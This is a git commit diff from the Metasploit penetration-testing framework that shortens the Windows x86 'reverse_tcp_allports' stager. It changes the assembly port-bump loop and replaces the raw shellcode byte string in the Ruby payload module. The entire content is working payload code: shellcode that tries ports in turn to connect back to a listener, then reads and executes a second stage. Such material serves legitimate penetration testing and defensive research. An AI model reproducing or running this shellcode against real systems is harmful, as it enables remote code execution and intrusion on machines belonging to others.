shave an instruction from the new allports stager

git-svn-id: file:///home/svn/framework3/trunk@7060 4d416f70-5f16-0410-b530-b9f4589650da
2009-09-25 06:13:13 +00:00 · 2009-09-25 06:13:13 +00:00 · bc2c38c332
parent b47b46e7c0
commit bc2c38c332
2 changed files with 14 additions and 14 deletions
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm
@ -40,6 +40,7 @@ set_address:
  push 0x5C110002        ; family AF_INET and port 1
  mov esi, esp           ; save pointer to sockaddr struct

+  xor ebx, ebx
 try_connect:
  push byte 16           ; length of the sockaddr struct
  push esi               ; pointer to the sockaddr struct
@ -51,12 +52,10 @@ try_connect:
  jz short connected

 port_bump:
-  xor eax, eax
-  mov word ax, [esi+2]
-  xchg ah,al
-  inc ax
-  xchg ah,al
-  mov word [esi+2], ax
+  xchg bh,bl
+  inc bx
+  xchg bh,bl
+  mov word [esi+2], bx
  jmp short try_connect

 connected:  
--- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb
@ -35,7 +35,7 @@ module Metasploit3
 					'RequiresMidstager' => false,
 					'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], },
 	 				'Payload' =>  
-						# Length: 294 bytes
+						# Length: 290 bytes
 						# Port Offset: 202
 						# Host Offset: 195
 						"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
@ -50,13 +50,14 @@ module Metasploit3
 						"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
 						"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
 						"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
-						"\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x01\x00\x89\xE6\x6A\x10" +
-						"\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x12\x31\xC0\x66" +
-						"\x8B\x46\x02\x86\xE0\x66\x40\x86\xE0\x66\x89\x46\x02\xEB\xDF\x6A" +
-						"\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40" +
-						"\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93" +
-						"\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29" +
-						"\xC6\x85\xF6\x75\xEC\xC3"
+						"\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x31\xDB" +
+						"\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\x86" +
+						"\xFB\x66\x43\x86\xFB\x66\x89\x5E\x02\xEB\xE5\x6A\x00\x6A\x04\x56" +
+						"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" +
+						"\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" +
+						"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
+						"\xEC\xC3"
+

 				}
 			))